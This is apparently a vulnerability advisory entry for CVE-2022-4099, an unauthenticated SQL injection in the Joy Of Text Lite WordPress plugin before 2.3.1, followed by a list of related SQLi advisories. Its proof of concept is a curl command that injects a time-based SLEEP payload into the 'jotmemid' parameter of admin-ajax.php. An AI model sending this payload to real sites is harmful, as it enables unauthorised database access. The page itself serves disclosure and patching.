Joy Of Text Lite < 2.3.1 – Unauthenticated SQLi | CVE 2022-4099 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape some parameters before using them in SQL statements accessible to unauthenticated users, leading to unauthenticated SQL injection

Proof of Concept

Invoke the following curl command to induce a 5 second sleep:

time curl 'https://example.com/wp-admin/admin-ajax.php?action=send_message' \
    --data 'jotmemid=x-+(SELECT+1+FROM+(SELECT(SLEEP(5)))aaaaaa)'

Affects Plugins

Fixed in 2.3.1

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

a282dd39-926d-406b-b8f5-e4c6e0c2c028

Timeline

Publicly Published

2022-12-08 (about 1 years ago)

Added

2022-12-08 (about 1 years ago)

Last Updated

2022-12-08 (about 1 years ago)

Other

Published

Title

Published

2024-04-12

Title

User Activity Log Pro <= 2.3.4 - Authenticated (Subscriber+) SQL Injection

Published

2017-07-05

Title

Add Edit Delete Listing For Member Module <= 1.0 - SQL Injection

Published

2023-11-06

Title

WP Reroute Email < 1.4.8 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Published

2021-09-21

Title

Game Server Status <= 1.0 - Contributor+ SQL Injection

Published

2022-05-11

Title

Five Minute Webshop <= 1.3.2 - Admin+ SQLi via orderby